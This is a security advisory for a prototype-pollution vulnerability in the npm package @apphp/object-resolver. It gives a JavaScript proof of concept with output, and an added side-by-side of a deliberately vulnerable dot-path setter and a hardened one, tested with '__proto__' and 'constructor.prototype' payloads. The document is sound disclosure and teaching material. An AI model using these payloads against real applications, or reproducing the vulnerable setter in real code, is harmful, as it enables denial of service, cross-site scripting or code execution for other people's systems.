All versions of this module prior to 3.1.1 are vulnerable to Prototype Pollution via Module.setNestedProperty (@apphp/object-resolver/dist/object-resolver.js:243). The function walks the user-supplied property path and recursively copies all child properties onto the destination object without validating the keys. An attacker can exploit this to write into the built-in Object through the special properties __proto__ or constructor.prototype (both of which resolve to Object.prototype).
Because every object created afterwards inherits the injected property, the attacker can use either key to pollute application logic; depending on how the polluted property is consumed, this can escalate to denial of service, remote code execution or cross-site scripting.
```js
(async () => {
  const lib = await import('@apphp/object-resolver');
  // An unrelated object that never touches the library; it only inherits from Object.prototype.
  const victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // The path climbs into Object.prototype and sets "polluted" there.
    lib.setNestedProperty({}, "__proto__.polluted", true);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up so the polluted property does not leak into other code in this process.
  delete Object.prototype.polluted;
})();
```
Output:

```
Before Attack: {}
After Attack: {"polluted":true}
```

Expected output after the patch:

```
Before Attack: {}
After Attack: {}
```
Update to the fixed version, 3.1.1.
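As an added illustration (not code from @apphp/object-resolver and not its patch), the block below puts a minimal dot-path setter in the style of the vulnerable API beside a hardened one, and runs both against the two vectors named above. The names setNestedPropertyVulnerable, setNestedPropertySafe, demo and FORBIDDEN_KEYS are hypothetical; the hardened version both rejects the dangerous keys and refuses to descend into inherited children, which is the check the original function lacks.

```javascript
'use strict';

// Added example, not code from @apphp/object-resolver. It shows why walking a
// user-controlled dot path without a key check reaches Object.prototype, and
// what a minimal fix looks like. All names below are hypothetical.

// Keys that let a dot path climb out of the target object and into the
// built-in Object (constructor.prototype === Object.prototype).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable variant: descends into whatever cur[k] already is, including
// inherited values, so "__proto__.polluted" and "constructor.prototype.polluted"
// both end up writing to Object.prototype.
function setNestedPropertyVulnerable(obj, path, value) {
  const keys = path.split('.');
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    const child = cur[k];
    if (child === null || (typeof child !== 'object' && typeof child !== 'function')) {
      cur[k] = {};
    }
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

// Hardened variant: rejects the dangerous keys outright and only descends into
// own, plain-object children, never into anything inherited from the prototype.
function setNestedPropertySafe(obj, path, value) {
  const keys = path.split('.');
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) {
      throw new TypeError(`unsafe property key in path: "${k}"`);
    }
  }
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    const own = Object.prototype.hasOwnProperty.call(cur, k);
    if (!own || cur[k] === null || typeof cur[k] !== 'object') {
      cur[k] = {};
    }
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

// Runs one payload against a setter and reports whether an unrelated, freshly
// created object now sees the injected property. Cleans up Object.prototype
// afterwards so the check does not leak between runs.
function demo(setter, path) {
  let threw = false;
  try {
    setter({}, path, true);
  } catch (e) {
    threw = true;
  }
  const polluted = ({}).polluted === true;
  delete Object.prototype.polluted;
  return { threw, polluted };
}

// The two vectors named in the advisory (constructed inputs).
const PAYLOADS = ['__proto__.polluted', 'constructor.prototype.polluted'];

for (const p of PAYLOADS) {
  console.log('vulnerable', p, demo(setNestedPropertyVulnerable, p));
  console.log('safe      ', p, demo(setNestedPropertySafe, p));
}
console.log('safe, benign path:', JSON.stringify(setNestedPropertySafe({}, 'a.b.c', 1)));
```

The own-property check matters even with the key blocklist in place: a path segment such as toString would otherwise make the setter descend into an inherited function object, and any future special-cased key would have to be added to the list. Rejecting the path with an exception, rather than silently skipping the key, also gives callers a signal that untrusted input was tampered with.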